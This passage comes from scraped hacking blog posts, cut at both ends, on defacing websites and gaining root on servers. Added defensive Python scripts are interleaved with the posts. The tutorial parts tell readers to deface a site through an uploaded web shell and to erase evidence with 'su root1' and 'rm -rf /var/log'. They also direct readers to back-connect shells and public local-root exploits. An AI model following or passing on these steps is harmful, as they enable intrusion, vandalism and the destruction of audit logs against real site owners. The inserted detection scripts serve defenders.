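    for e in parse_passwd(text):
        by_uid[e["uid"]].append(e["name"])
    return {uid: names for uid, names in by_uid.items() if len(names) > 1}


def audit(text: str) -> List[str]:
    """Human-readable findings; an empty list means nothing suspicious was found."""
    findings = [f"UID 0 account not on allow-list: {n}"
                for n in find_rogue_root_accounts(text)]
    for uid, names in sorted(find_shared_uids(text).items()):
        findings.append(f"UID {uid} shared by {', '.join(names)}")
    return findings


if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, encoding="utf-8").read() if path else SAMPLE_PASSWD
    for line in audit(data) or ["no findings"]:
        print(line)
```

<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Run without arguments it audits the constructed sample and reports root1; run against /etc/passwd it audits the live file. The shared-UID check is kept separate from the UID-0 check because any duplicated UID, not only 0, lets one account act as another.</span></div>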
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">4. Deface the Website:</span></h4>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">What is defacing?</em><br />Defacing is the procedure in which the hacker uploads his own index webpage to <strong>alter the homepage</strong> of a site. In this way he can <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">boost his reputation</span> or <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">pass a message</span> to the people or the company <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(which owns the website…).</em></span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Since you have the website shelled, you just create a nice hacky page in <a href="http://www.w3schools.org/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">html</a> and upload it via the Shell as index.html (delete or rename the website's own one…)</span></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">5. Cover your tracks:</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you <strong>we have to delete logs.</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">First of all, Unix-based machines have some logs that you had better either edit or delete.<br />Common Linux log file names and their usage:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">/var/log/message: General messages and system-related logs<br />/var/log/auth.log: Authentication logs<br />/var/log/kern.log: Kernel logs<br />/var/log/cron.log: Crond logs (cron jobs)<br />/var/log/maillog: Mail server logs<br />/var/log/qmail/ : Qmail log directory (more files inside this directory)<br />/var/log/httpd/: Apache access and error logs directory<br />/var/log/lighttpd: Lighttpd access and error logs directory<br />/var/log/boot.log : System boot log<br />/var/log/mysqld.log: MySQL database server log file<br />/var/log/secure: Authentication log<br />/var/log/utmp or /var/log/wtmp : Login records file<br />/var/log/yum.log: Yum log files</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">In short, /var/log is where you should find all Linux log files.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">To delete all of them at once, type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">su root1</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">rm -rf /var/log<br />mkdir /var/log</span></div>
</blockquote>
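<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Removing and recreating /var/log does not remove the evidence that it happened. Daemons such as rsyslog, sshd and Apache keep their log files open, so after "rm -rf /var/log" the kernel keeps each unlinked inode alive and /proc/&lt;pid&gt;/fd/&lt;n&gt; points at "/var/log/... (deleted)". The script below is an added example (not part of the tutorial, and not its author's code) that looks for exactly that, and also reports expected log files that are absent. The list of expected files, the sample descriptor links and the sample directory contents are constructed assumptions; which files exist varies by distribution.</span></div>

```python
"""Detect a wiped /var/log from the defender's side.

Added example for this page, not the tutorial's own code. "rm -rf /var/log"
does not close the descriptors that logging daemons hold, so the unlinked
files remain visible as "/var/log/... (deleted)" under /proc/<pid>/fd.
"""
import os
from typing import Dict, Iterable, List, Tuple

FdKey = Tuple[int, int]            # (pid, fd number)
Finding = Tuple[int, int, str]      # (pid, fd, original path of the unlinked file)

# Assumed expected files, taken from the tutorial's list; adjust per distribution.
EXPECTED_LOGS = ["/var/log/auth.log", "/var/log/kern.log",
                 "/var/log/wtmp", "/var/log/secure"]

# Constructed sample of readlink() results for /proc/<pid>/fd/<n> on a host
# where /var/log was removed and recreated while the daemons kept running.
SAMPLE_FD_LINKS: Dict[FdKey, str] = {
    (412, 3): "/var/log/syslog (deleted)",
    (412, 4): "/var/log/auth.log (deleted)",
    (412, 5): "socket:[18231]",
    (900, 1): "/dev/null",
    (1337, 7): "/var/log/nginx/access.log",
    (1337, 8): "/tmp/scratch (deleted)",      # unlinked, but not a log file
}
# Constructed: the only file left under the recreated /var/log.
SAMPLE_PRESENT = {"/var/log/nginx/access.log"}


def find_deleted_open_logs(fd_links: Dict[FdKey, str],
                           log_dir: str = "/var/log") -> List[Finding]:
    """Descriptors still open on log files whose directory entry is gone."""
    marker = " (deleted)"
    prefix = log_dir.rstrip("/") + "/"
    hits = []
    for (pid, fd), target in sorted(fd_links.items()):
        if target.startswith(prefix) and target.endswith(marker):
            hits.append((pid, fd, target[:-len(marker)]))
    return hits


def find_missing_logs(present: Iterable[str],
                      expected: Iterable[str] = EXPECTED_LOGS) -> List[str]:
    """Expected log files that are not in the directory listing."""
    present_set = set(present)
    return [p for p in expected if p not in present_set]


def collect_fd_links(proc: str = "/proc") -> Dict[FdKey, str]:
    """Read every readable /proc/<pid>/fd/<n> symlink on the live host."""
    links: Dict[FdKey, str] = {}
    for pid in (p for p in os.listdir(proc) if p.isdigit()):
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            fds = os.listdir(fd_dir)
        except (PermissionError, FileNotFoundError):
            continue  # not our process, or it exited meanwhile
        for fd in fds:
            try:
                links[(int(pid), int(fd))] = os.readlink(os.path.join(fd_dir, fd))
            except OSError:
                continue
    return links


def present_logs(log_dir: str = "/var/log") -> set:
    """All regular files currently under log_dir (unreadable dirs are skipped)."""
    return {os.path.join(root, f) for root, _, files in os.walk(log_dir) for f in files}


if __name__ == "__main__":
    live = os.path.isdir("/proc") and os.path.isdir("/var/log")
    links = collect_fd_links() if live else SAMPLE_FD_LINKS
    present = present_logs() if live else SAMPLE_PRESENT
    for pid, fd, path in find_deleted_open_logs(links):
        print(f"pid {pid} fd {fd} still holds unlinked log {path}")
    for path in find_missing_logs(present):
        print(f"expected log file missing: {path}")
```

<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">On a live host the descriptor scan needs root to read other processes' fd directories; without it, only the caller's own processes are inspected. The same check is what "lsof +L1" shows interactively, and the unlinked data can still be copied out of /proc/&lt;pid&gt;/fd/&lt;n&gt; for as long as the daemon keeps the file open.</span></div>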
<h2 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.8em; font-weight: normal; line-height: 1em; margin: 30px 0px 0px; padding: 0px 0px 9px; vertical-align: baseline;">
<span style="background-color: white;">End of this Tutorial:</span></h2>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><strong>This was a great tutorial on Web-Hacking. I reassure you that more hacking tutorials are coming. </strong><br />A great community about hacking is at <a href="http://www.hackforuks.net/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">Hackforums.net</a></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<br /></div>
<h3 style="border: 0px; color: #cc0000; font-family: impact, Verdana, Arial, sans-serif; font-size: 2.5em; font-weight: inherit; line-height: 1em; margin: 8px 0px 18px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">You can also <a href="http://gnahackteam.wordpress.com/2012/07/26/rooting-a-server-without-any-public-local-root-kernel-exploits/" style="border: 0px; color: #cc0000; font-size: 30px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="Rooting a Server without any Public Local Root Kernel Exploits!">check this Post out, if you like this Tutorial….</a></span></h3>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-50840957427614647412013-09-04T22:41:00.002-07:002013-09-04T22:41:42.670-07:00ROOTING A SERVER : LEARN ETHICAL HACKING<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin0jOs9U9p2xDygjq9YETLJPRL7B1tw7BoMai9EHrGjrks4ffIUvcp60OelDMVXQM41JWraNPeAkeAWEWKSpskNozmeGBhxPuCY6nUw7tsW-6lT1FQ3WX4VjbQLV0LXG6jdSRDD3R5xqgr/s1600/rooted24.jpg" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="231" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEin0jOs9U9p2xDygjq9YETLJPRL7B1tw7BoMai9EHrGjrks4ffIUvcp60OelDMVXQM41JWraNPeAkeAWEWKSpskNozmeGBhxPuCY6nUw7tsW-6lT1FQ3WX4VjbQLV0LXG6jdSRDD3R5xqgr/s400/rooted24.jpg" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="400" /></a></div>
<b style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">What is Root?</b><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Root is the administrator of the whole server. If someone gets root access he can do anything with the server, such as delete or copy anything on it, or deface all of its home pages (a mass defacement).</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">We won't talk about root on Windows here. That is enough for a beginner, because if I talked about root in full I would need another book.
So, I guess now we know the importance of root access and why we try to get root.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><b style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">How to get Root?</b><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">There are 3 ways to get ROOT on a server:</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">1 – With a local root.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">2 – With SQL, by reading
some important files on it that hold the root password.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">3 – With an exploit for a piece of software (buffer overflow).</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">In this post we will explain local root. I will explain the other ways soon in another post.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">OK, let's get back to work.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br />
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOIhrfF5kFlvtdf475vf-94vPsoTc6-KpKZcvebQZraCAX5h-k_Cn5kYnsuRjcx78o-Sa7-i5Xf7solMm7p0RIAj9D0OVlg4GHinjE7WGFMK5jOTH8H65XFykT0hCsqYNdyTIC5lZWaxMo/s1600/shell.png" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOIhrfF5kFlvtdf475vf-94vPsoTc6-KpKZcvebQZraCAX5h-k_Cn5kYnsuRjcx78o-Sa7-i5Xf7solMm7p0RIAj9D0OVlg4GHinjE7WGFMK5jOTH8H65XFykT0hCsqYNdyTIC5lZWaxMo/s400/shell.png" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="400" /></a></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
After uploading your shell to the server and getting the local root, you will do a back connect and run the local root to get root. This is a rough idea of how it works; in the next steps you will see how to</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
find a local root and run it to get root access.</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<b style="border: 0px; margin: 0px; outline: none; padding: 0px;">How to Search Local root?</b></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
First of all, you need to know which version of the kernel is running.</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
You can find that out from your shell; for example, this version is 2.6.18 - 2012</div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjREyS_lILZagcToSrG-Ibf5xQmvklJOLO9bmH888zWxdPWoqPpkORfySeaUDgVI9x1uyJGbKUUOxHsfWzuK9qeu64qvJllZy9VLwndqlf26mBHdW4tpdU9l84tXhySChUSEqfZNYrm4qby/s1600/shell1.png" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="51" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjREyS_lILZagcToSrG-Ibf5xQmvklJOLO9bmH888zWxdPWoqPpkORfySeaUDgVI9x1uyJGbKUUOxHsfWzuK9qeu64qvJllZy9VLwndqlf26mBHdW4tpdU9l84tXhySChUSEqfZNYrm4qby/s640/shell1.png" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="640" /></a></div>
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<br style="border: 0px; margin: 0px; outline: none; padding: 0px;" /></div>
<span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Go to EXECUTE on your shell and write "uname -a". You will get the same result, by the way.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">Now, how to find the local root.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc., which provide these local roots. One more thing to note is that there are two types of local roots:</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">1.
Local.C: which are not ready to use.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">2. Local: ready to use.</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><b style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">How to get Root access?</b><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><span style="background-color: white; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px;">First you need a shell with a Back Connect option, like this:</span><br style="background-color: white; border: 0px; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;" /><br />
<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7IGzrtZlRZjCQy7camqr8nCyBYLcI6nTA095JQJLVRmKi_Tsx1md5aisbY8Wuqzb6r0-A5GA1-rbQefpsZtArjCgkTsuizBMX-VuXhEdEqF-mAOVUcUAe3dHw-QcW5AoZ-2RlA2TBmlhQ/s1600/backconet.png" imageanchor="1" style="border: 0px; color: #102c4a; margin: 0px 1em; outline: none; padding: 0px; text-decoration: none;"><img border="0" height="80" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7IGzrtZlRZjCQy7camqr8nCyBYLcI6nTA095JQJLVRmKi_Tsx1md5aisbY8Wuqzb6r0-A5GA1-rbQefpsZtArjCgkTsuizBMX-VuXhEdEqF-mAOVUcUAe3dHw-QcW5AoZ-2RlA2TBmlhQ/s320/backconet.png" style="-webkit-box-shadow: rgb(16, 44, 74) 0px 0px 5px; border: 0px; box-shadow: rgb(16, 44, 74) 0px 0px 5px; margin: 0px; outline: none; padding: 5px;" width="320" /></a></div>
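<div class="separator" style="background-color: white; border: 0px; clear: both; color: #636363; font-family: 'Century Gothic', Arial, sans-serif; font-size: 14px; line-height: 21px; margin: 0px; outline: none; padding: 0px;">
On the server, the back connect described here is an ordinary outbound TCP connection, but one owned by an interpreter or shell (perl, sh, nc) instead of by a service, and that shape is cheap for an administrator to look for. The script below is an added example (not part of this post, and not its author's code) that parses "ss -tnp" output and flags established connections owned by a shell-like process whose local port is not one of the host's service ports. The process-name list, the service-port list and the sample "ss" lines are constructed assumptions.</div>

```python
"""Flag likely back-connect (reverse) shells from `ss -tnp` output.

Added example for this page, not the post's own code. A web server that
suddenly owns an established outbound connection from perl, sh or nc is
worth a look; this script spots that pattern in `ss -tnp` output.
"""
import re
from typing import List, NamedTuple

# Assumed: process names that should not be holding outbound connections on a web host.
SHELL_LIKE = {"sh", "bash", "dash", "perl", "python", "python3", "nc", "ncat", "socat", "php"}

# One `ss -tnp` row, e.g.
# ESTAB 0 0 10.0.0.5:48812 203.0.113.9:433 users:(("perl",pid=2231,fd=3))
# The header row and LISTEN rows with a "*" peer port do not match and are skipped.
LINE_RE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+)\s+users:\(\(\"(?P<proc>[^\"]+)\",pid=(?P<pid>\d+),fd=\d+\)\)"
)

# Constructed sample output (documentation IP ranges, not a real host).
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:80 198.51.100.7:51322 users:(("apache2",pid=1201,fd=12))
ESTAB 0 0 10.0.0.5:48812 203.0.113.9:433 users:(("perl",pid=2231,fd=3))
ESTAB 0 0 10.0.0.5:22 198.51.100.20:50411 users:(("sshd",pid=877,fd=4))
ESTAB 0 0 10.0.0.5:52110 10.0.0.9:3306 users:(("php-fpm",pid=1322,fd=9))
LISTEN 0 128 0.0.0.0:80 0.0.0.0:* users:(("apache2",pid=1100,fd=4))
"""


class Conn(NamedTuple):
    state: str
    laddr: str
    lport: int
    raddr: str
    rport: int
    proc: str
    pid: int


def parse_ss(output: str) -> List[Conn]:
    """Parse the rows of `ss -tnp`; rows that do not fit the pattern are skipped."""
    conns = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            conns.append(Conn(m["state"], m["laddr"], int(m["lport"]),
                              m["raddr"], int(m["rport"]), m["proc"], int(m["pid"])))
    return conns


def suspicious_back_connects(output: str, service_ports=(22, 80, 443)) -> List[Conn]:
    """Established connections owned by a shell-like process on a non-service local port.

    An inbound client connection to a service has the service port as its local
    port; an outbound back connect has an ephemeral local port instead.
    """
    return [c for c in parse_ss(output)
            if c.state == "ESTAB" and c.proc in SHELL_LIKE and c.lport not in service_ports]


if __name__ == "__main__":
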